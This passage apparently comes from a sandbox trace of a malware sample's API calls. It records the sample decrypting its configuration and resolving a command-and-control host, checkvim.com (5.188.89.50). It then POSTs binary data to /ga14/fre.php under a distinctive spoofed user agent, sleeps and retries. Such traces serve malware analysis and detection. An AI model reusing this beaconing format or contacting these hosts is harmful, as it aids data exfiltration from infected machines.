LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0287.586] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fce8) returned 1 [0287.591] GetProcessHeap () returned 0x840000 [0287.591] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0287.592] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0287.592] CryptImportKey (in: hProv=0x86fce8, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e2f0) returned 1 [0287.593] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0287.593] CryptSetKeyParam (hKey=0x87e2f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0287.594] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0287.594] CryptSetKeyParam (hKey=0x87e2f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0287.594] GetProcessHeap () returned 0x840000 [0287.594] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0287.595] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0287.595] CryptDecrypt (in: hKey=0x87e2f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f758, pdwDataLen=0x19f9a4 | out: pbData=0x87f758, pdwDataLen=0x19f9a4) returned 1 [0287.596] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0287.596] CryptDestroyKey (hKey=0x87e2f0) returned 1 [0287.596] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0287.597] CryptReleaseContext (hProv=0x86fce8, dwFlags=0x0) returned 1 [0287.597] GetProcessHeap () returned 0x840000 [0287.597] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0287.597] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0287.598] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0287.598] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0287.598] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0287.599] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0287.599] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0287.599] GetProcessHeap () returned 0x840000 [0287.599] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713d0 [0287.599] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871600*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0287.601] GetProcessHeap () returned 0x840000 [0287.601] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b58 [0287.601] socket (af=2, type=1, protocol=6) returned 0x478 [0287.601] connect (s=0x478, name=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0287.669] FreeAddrInfoW (pAddrInfo=0x871600*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0287.669] GetProcessHeap () returned 0x840000 [0287.669] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x870128 [0287.669] GetProcessHeap () returned 0x840000 [0287.669] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0287.670] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0287.670] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0287.670] GetProcessHeap () returned 0x840000 [0287.670] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0287.671] GetProcessHeap () returned 0x840000 [0287.671] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0287.671] GetProcessHeap () returned 0x840000 [0287.671] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fb90 [0287.671] GetProcessHeap () returned 0x840000 [0287.671] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0287.671] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0287.672] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0287.672] GetProcessHeap () returned 0x840000 [0287.672] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0287.672] GetProcessHeap () returned 0x840000 [0287.672] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0287.672] send (s=0x478, buf=0x873a58*, len=237, flags=0) returned 237 [0287.673] send (s=0x478, buf=0x87eb58*, len=159, flags=0) returned 159 [0287.673] GetProcessHeap () returned 0x840000 [0287.673] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0287.673] recv (in: s=0x478, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0288.017] GetProcessHeap () returned 0x840000 [0288.017] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0288.017] GetProcessHeap () returned 0x840000 [0288.017] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb90 | out: hHeap=0x840000) returned 1 [0288.017] GetProcessHeap () returned 0x840000 [0288.017] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0288.018] GetProcessHeap () returned 0x840000 [0288.018] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870128 | out: hHeap=0x840000) returned 1 [0288.018] closesocket (s=0x478) returned 0 [0288.018] GetProcessHeap () returned 0x840000 [0288.018] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b58 | out: hHeap=0x840000) returned 1 [0288.018] GetProcessHeap () returned 0x840000 [0288.018] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0288.018] GetProcessHeap () returned 0x840000 [0288.018] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f758 | out: hHeap=0x840000) returned 1 [0288.018] GetProcessHeap () returned 0x840000 [0288.018] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713d0 | out: hHeap=0x840000) returned 1 [0288.018] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x680) returned 0x478 [0288.020] Sleep (dwMilliseconds=0xea60) [0288.021] GetProcessHeap () returned 0x840000 [0288.021] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fa28 [0288.022] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0288.022] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0288.027] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0288.028] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x870128) returned 1 [0288.034] GetProcessHeap () returned 0x840000 [0288.034] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0288.034] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0288.035] CryptImportKey (in: hProv=0x870128, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e330) returned 1 [0288.035] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0288.036] CryptSetKeyParam (hKey=0x87e330, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0288.036] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0288.036] CryptSetKeyParam (hKey=0x87e330, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0288.036] GetProcessHeap () returned 0x840000 [0288.036] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0288.037] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0288.037] CryptDecrypt (in: hKey=0x87e330, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fa28, pdwDataLen=0x19f9a4 | out: pbData=0x87fa28, pdwDataLen=0x19f9a4) returned 1 [0288.038] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0288.038] CryptDestroyKey (hKey=0x87e330) returned 1 [0288.039] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0288.039] CryptReleaseContext (hProv=0x870128, dwFlags=0x0) returned 1 [0288.039] GetProcessHeap () returned 0x840000 [0288.039] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0288.039] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0288.040] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0288.040] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0288.041] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0288.041] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0288.042] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0288.042] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0288.042] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0288.042] GetProcessHeap () returned 0x840000 [0288.042] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8711a0 [0288.042] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0288.043] GetProcessHeap () returned 0x840000 [0288.043] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8711a0 | out: hHeap=0x840000) returned 1 [0288.043] GetProcessHeap () returned 0x840000 [0288.043] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0288.043] GetProcessHeap () returned 0x840000 [0288.043] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fa28 | out: hHeap=0x840000) returned 1 [0288.043] GetProcessHeap () returned 0x840000 [0288.043] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fc20 [0288.044] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0288.044] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0288.048] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0288.049] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f8a8) returned 1 [0288.055] GetProcessHeap () returned 0x840000 [0288.055] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0288.055] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0288.056] CryptImportKey (in: hProv=0x86f8a8, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e5b0) returned 1 [0288.056] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0288.057] CryptSetKeyParam (hKey=0x87e5b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0288.057] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0288.057] CryptSetKeyParam (hKey=0x87e5b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0288.057] GetProcessHeap () returned 0x840000 [0288.057] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0288.058] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0288.058] CryptDecrypt (in: hKey=0x87e5b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fc20, pdwDataLen=0x19f9a4 | out: pbData=0x87fc20, pdwDataLen=0x19f9a4) returned 1 [0288.059] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0288.059] CryptDestroyKey (hKey=0x87e5b0) returned 1 [0288.060] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0288.060] CryptReleaseContext (hProv=0x86f8a8, dwFlags=0x0) returned 1 [0288.060] GetProcessHeap () returned 0x840000 [0288.060] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0288.060] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0288.061] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0288.061] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0288.062] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0288.062] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0288.063] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0288.063] GetProcessHeap () returned 0x840000 [0288.063] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871268 [0288.063] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c98*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0288.064] GetProcessHeap () returned 0x840000 [0288.064] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871bc8 [0288.064] socket (af=2, type=1, protocol=6) returned 0x47c [0288.064] connect (s=0x47c, name=0x878c98*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0288.129] FreeAddrInfoW (pAddrInfo=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c98*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0288.129] GetProcessHeap () returned 0x840000 [0288.129] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f710 [0288.129] GetProcessHeap () returned 0x840000 [0288.129] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0288.130] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0288.131] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0288.131] GetProcessHeap () returned 0x840000 [0288.131] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x87f4f0 [0288.131] GetProcessHeap () returned 0x840000 [0288.131] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0288.131] GetProcessHeap () returned 0x840000 [0288.131] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fd40 [0288.131] GetProcessHeap () returned 0x840000 [0288.131] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0288.131] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0288.132] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0288.132] GetProcessHeap () returned 0x840000 [0288.132] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0288.132] GetProcessHeap () returned 0x840000 [0288.132] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0288.132] send (s=0x47c, buf=0x873a58*, len=237, flags=0) returned 237 [0288.132] send (s=0x47c, buf=0x87eb58*, len=159, flags=0) returned 159 [0288.133] GetProcessHeap () returned 0x840000 [0288.133] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0288.133] recv (in: s=0x47c, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0288.509] GetProcessHeap () returned 0x840000 [0288.509] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0288.509] GetProcessHeap () returned 0x840000 [0288.509] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fd40 | out: hHeap=0x840000) returned 1 [0288.509] GetProcessHeap () returned 0x840000 [0288.509] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f4f0 | out: hHeap=0x840000) returned 1 [0288.509] GetProcessHeap () returned 0x840000 [0288.509] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f710 | out: hHeap=0x840000) returned 1 [0288.509] closesocket (s=0x47c) returned 0 [0288.509] GetProcessHeap () returned 0x840000 [0288.509] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871bc8 | out: hHeap=0x840000) returned 1 [0288.509] GetProcessHeap () returned 0x840000 [0288.509] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0288.509] GetProcessHeap () returned 0x840000 [0288.509] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fc20 | out: hHeap=0x840000) returned 1 [0288.510] GetProcessHeap () returned 0x840000 [0288.510] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871268 | out: hHeap=0x840000) returned 1 [0288.513] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x6c0) returned 0x47c [0288.536] Sleep (dwMilliseconds=0xea60) [0288.540] GetProcessHeap () returned 0x840000 [0288.540] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f680 [0288.541] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0288.541] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0288.547] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0288.547] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fd70) returned 1 [0288.553] GetProcessHeap () returned 0x840000 [0288.553] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0288.554] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0288.554] CryptImportKey (in: hProv=0x86fd70, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e270) returned 1 [0288.555] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0288.555] CryptSetKeyParam (hKey=0x87e270, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0288.556] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0288.556] CryptSetKeyParam (hKey=0x87e270, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0288.556] GetProcessHeap () returned 0x840000 [0288.556] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0288.556] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0288.557] CryptDecrypt (in: hKey=0x87e270, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f680, pdwDataLen=0x19f9a4 | out: pbData=0x87f680, pdwDataLen=0x19f9a4) returned 1 [0288.557] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0288.558] CryptDestroyKey (hKey=0x87e270) returned 1 [0288.558] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0288.558] CryptReleaseContext (hProv=0x86fd70, dwFlags=0x0) returned 1 [0288.558] GetProcessHeap () returned 0x840000 [0288.558] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0288.559] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0288.559] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0288.560] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0288.560] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0288.561] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0288.561] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0288.561] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0288.562] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0288.562] GetProcessHeap () returned 0x840000 [0288.562] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0288.562] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0288.562] GetProcessHeap () returned 0x840000 [0288.562] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0288.563] GetProcessHeap () returned 0x840000 [0288.563] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0288.563] GetProcessHeap () returned 0x840000 [0288.563] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0288.563] GetProcessHeap () returned 0x840000 [0288.563] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fea8 [0288.563] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0288.564] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0288.568] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0288.568] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f820) returned 1 [0288.579] GetProcessHeap () returned 0x840000 [0288.579] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0288.579] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0288.580] CryptImportKey (in: hProv=0x86f820, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e3b0) returned 1 [0288.580] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0288.581] CryptSetKeyParam (hKey=0x87e3b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0288.581] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0288.581] CryptSetKeyParam (hKey=0x87e3b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0288.581] GetProcessHeap () returned 0x840000 [0288.581] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0288.582] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0288.582] CryptDecrypt (in: hKey=0x87e3b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fea8, pdwDataLen=0x19f9a4 | out: pbData=0x87fea8, pdwDataLen=0x19f9a4) returned 1 [0288.583] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0288.583] CryptDestroyKey (hKey=0x87e3b0) returned 1 [0288.584] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0288.584] CryptReleaseContext (hProv=0x86f820, dwFlags=0x0) returned 1 [0288.584] GetProcessHeap () returned 0x840000 [0288.584] 